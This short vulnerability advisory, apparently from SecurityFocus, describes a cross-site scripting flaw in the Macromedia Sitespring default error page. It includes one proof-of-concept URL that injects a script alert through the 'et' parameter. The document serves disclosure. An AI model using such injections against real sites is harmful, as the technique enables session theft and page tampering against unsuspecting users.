Macromedia Sitespring Default Error Page Cross Site Scripting Vulnerability

No exploit is required. The following example has been provided by Peter Gründl <pgrundl@kpmg.dk>:

http://server/error/500error.jsp?et=1<script>alert('KPMG')</script>


 

Privacy Statement
Copyright 2010, SecurityFocus